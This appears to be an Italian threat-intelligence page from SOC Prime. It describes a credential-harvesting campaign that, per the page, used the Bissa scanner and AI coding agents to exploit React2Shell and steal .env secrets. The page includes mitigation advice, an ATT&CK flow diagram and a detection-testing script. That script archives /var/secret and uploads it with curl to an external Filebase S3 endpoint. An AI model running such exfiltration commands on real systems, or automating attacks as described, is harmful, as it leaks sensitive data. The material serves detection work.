SOC Prime Bias: Critico

24 Apr 2026 15:19 UTC

Bissa Scanner Esposto: Sfruttamento Massimale Assistito dall’AI e Raccolta di Credenziali

Author Photo
SOC Prime Team linkedin icon Segui
Bissa Scanner Esposto: Sfruttamento Massimale Assistito dall’AI e Raccolta di Credenziali
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riepilogo

Un server esposto ha rivelato un’operazione su larga scala che utilizzava la piattaforma di scannerizzazione Bissa, Claude Code e OpenClaw per automatizzare lo sfruttamento di obiettivi esposti a Internet tramite una vulnerabilità React2Shell (CVE-2025-55182). La campagna ha sottratto milioni di file .env contenenti credenziali di alto valore da servizi AI, cloud, pagamento e messaggistica. I dati raccolti sono stati caricati su un bucket S3 pubblico su Filebase per un uso futuro. L’operazione ha preso di mira organizzazioni nei settori finanziario, delle criptovalute e della vendita al dettaglio.

Investigazione

Gli analisti hanno recuperato oltre 13.000 file che mostrano il flusso di lavoro per la scansione, lo sfruttamento, la convalida e la prioritizzazione degli ambienti delle vittime. I log hanno confermato oltre 900 compromissioni riuscite utilizzando lo sfruttamento React2Shell. Sono stati utilizzati bot Telegram per avvisi in tempo reale, collegando ogni colpo ai dettagli delle vittime. Lo scanner conteneva anche un modulo per una vulnerabilità di WordPress W3 Total Cache (CVE-2025-9501), ma non è stata osservata alcuna exploitazione con successo.

Mitigazione

Applica rapidamente patch a applicazioni e framework vulnerabili, in particolare i componenti React2Shell e WordPress W3 Total Cache. Sposta i segreti dai file .env in gestori di segreti dedicati e ruota periodicamente le credenziali. Rinforza l’accesso ai metadati nel cloud e applica la RBAC del minimo privilegio. Monitora il traffico in uscita per rilevare upload non autorizzati a servizi di storage esterni.

Risposta

Implementare regole di rilevamento per lo sfruttamento di CVE-2025-55182 e upload S3 non autorizzati. Bloccare domini noti dannosi e comunicazioni tramite bot Telegram. Condurre analisi forense degli host compromessi per individuare e rimuovere payload residuali. Notificare immediatamente gli utenti colpiti e ruotare eventuali credenziali trapelate.

"graph TB %% Class definitions classDef technique fill:#ffcc99 classDef tool fill:#cccccc classDef action fill:#99ccff classDef operator fill:#ff9900 %% Nodes tool_bissa_scanner["<b>Tool</b> – <b>Nome</b>: Bissa scanner<br/><b>Scopo</b>: Esegue una scansione attiva massiva utilizzando feed di target"] class tool_bissa_scanner tool tech_T1595_002["<b>Tecnica</b> – <b>T1595.002 Scansione Attiva: Scansione di Vulnerabilità</b><br/><b>Descrizione</b>: Scansiona host esposti a Internet per trovare servizi vulnerabili"] class tech_T1595_002 technique tech_T1190["<b>Tecnica</b> – <b>T1190 Sfruttamento di Applicazioni Pubbliche</b><br/><b>Descrizione</b>: Sfrutta applicazioni web vulnerabili per ottenere accesso iniziale"] class tech_T1190 technique tool_react2shell["<b>Tool</b> – <b>Nome</b>: React2Shell (CVEu20112025u201155182)<br/><b>Funzione</b>: Fornisce esecuzione di codice remoto tramite payload React fabbricati"] class tool_react2shell tool tech_T1210["<b>Tecnica</b> – <b>T1210 Sfruttamento di Servizi Remoti</b><br/><b>Descrizione</b>: Esegue il payload su servizi remoti per ottenere l’esecuzione di codice"] class tech_T1210 technique tech_T1211["<b>Tecnica</b> – <b>T1211 Sfruttamento per Evasione dalle Difese</b><br/><b>Descrizione</b>: Utilizza vulnerabilità per bypassare le difese e rimanere nascosto"] class tech_T1211 technique tech_T1552_001["<b>Tecnica</b> – <b>T1552.001 Credenziali Non Sicure: Credenziali nei File</b><br/><b>Descrizione</b>: Ottenere credenziali archiviate in file di configurazione come .env"] class tech_T1552_001 technique tech_T1119["<b>Tecnica</b> – <b>T1119 Raccolta Automatizzata</b><br/><b>Descrizione</b>: Automatizza la convalida, la prioritizzazione e il raggruppamento dei dati raccolti per l’esfiltrazione"] class tech_T1119 technique tech_T1102_002["<b>Tecnica</b> – <b>T1102.002 Servizio Web: Comunicazione Bidirezionale</b><br/><b>Descrizione</b>: Utilizza servizi web (bot Telegram) per scambiare comandi e dati"] class tech_T1102_002 technique tool_telegram_bot["<b>Tool</b> – <b>Nome</b>: Bot Telegram @bissapwned_bot, @bissa_scan_bot<br/><b>Scopo</b>: Canale di comando e controllo"] class tool_telegram_bot tool tech_T1567_002["<b>Tecnica</b> – <b>T1567.002 Esfiltrazione Tramite Servizio Web: Esfiltrazione su Archivio Cloud</b><br/><b>Descrizione</b>: Carica archivi rubati su storage cloud tramite servizio web"] class tech_T1567_002 technique tool_filebase_bucket["<b>Tool</b> – <b>Nome</b>: Bucket compatibile con Filebase S3 (bissapromax)<br/><b>Scopo</b>: Archivia credenziali esfiltrate"] class tool_filebase_bucket tool tech_T1537["<b>Tecnica</b> – <b>T1537 Trasferimento Dati su Cloud Account</b><br/><b>Descrizione</b>: Sposta dati su un account cloud controllato dagli aggressori per recupero successivo"] class tech_T1537 technique tech_T1068["<b>Tecnica</b> – <b>T1068 Sfruttamento per Escalation di Privilegi</b><br/><b>Descrizione</b>: Utilizza credenziali ottenute per ottenere privilegi maggiori e spostamenti laterali"] class tech_T1068 technique %% Connections tool_bissa_scanner –>|esegue| tech_T1595_002 tech_T1595_002 –>|identifica servizi vulnerabili| tech_T1190 tech_T1190 –>|utilizza| tool_react2shell tool_react2shell –>|fornisce payload a| tech_T1210 tech_T1210 –>|abilita| tech_T1211 tech_T1211 –>|permette| tech_T1552_001 tech_T1552_001 –>|alimenta| tech_T1119 tech_T1119 –>|invia dati tramite| tech_T1102_002 tech_T1102_002 –>|implementato da| tool_telegram_bot tech_T1102_002 –>|esfiltra su| tech_T1567_002 tech_T1567_002 –>|archivia in| tool_filebase_bucket tool_filebase_bucket –>|abilita| tech_T1537 tech_T1537 –>|supporta| tech_T1068 "

Flusso di Attacco

Esecuzione di Simulazione

Prerequisito: Il Controllo Precedente di Telemetria e Baseline deve essere stato superato.

  • Narrativa e Comandi d’Attacco:
    L’avversario ha raccolto un insieme di documenti riservati da /var/secret/. Per evitare il rilevamento, prima archiviano i dati in un file ZIP protetto da password, poi utilizzano curl per caricare l’archivio direttamente al punto finale Filebase S3 attraverso il proxy aziendale. Il proxy registra l’URL completo della richiesta, che corrisponde alla regola di rilevamento.

  • Script di Test di Regressione:

    #!/usr/bin/env bash
    set -euo pipefail
    
    # 1️⃣ Staging dati (T1074)
    STAGE_DIR="/tmp/staged_data"
    mkdir -p "$STAGE_DIR"
    cp -r /var/secret/* "$STAGE_DIR/"
    
    # 2️⃣ Archivio dati (T1560.001) – zip protetto da password
    ARCHIVE="/tmp/exfil_archive.zip"
    ZIP_PASSWORD="P@ssw0rd!"
    zip -r -P "$ZIP_PASSWORD" "$ARCHIVE" "$STAGE_DIR" > /dev/null
    
    # 3️⃣ Esfiltrazione tramite endpoint Filebase S3 (T1020)
    # Assume che il proxy sia raggiungibile a http://proxy.company.local:3128
    FILEBASE_URL="https://s3.filebase.com/mybucket/exfil_archive.zip"
    curl -x http://proxy.company.local:3128 
         -T "$ARCHIVE" 
         -H "Host: s3.filebase.com" 
         -H "User-Agent: Mozilla/5.0" 
         "$FILEBASE_URL" 
         --silent --output /dev/null
    
    echo "Tentativo di esfiltrazione completato."
  • Comandi di Pulizia:

    # Rimuovi file messi in scena e archivio
    rm -rf /tmp/staged_data /tmp/exfil_archive.zip
    
    # (Opzionale) Svuota connessioni proxy se necessario
    # Per Squid: squid -k rotate
    echo "Pulizia completata."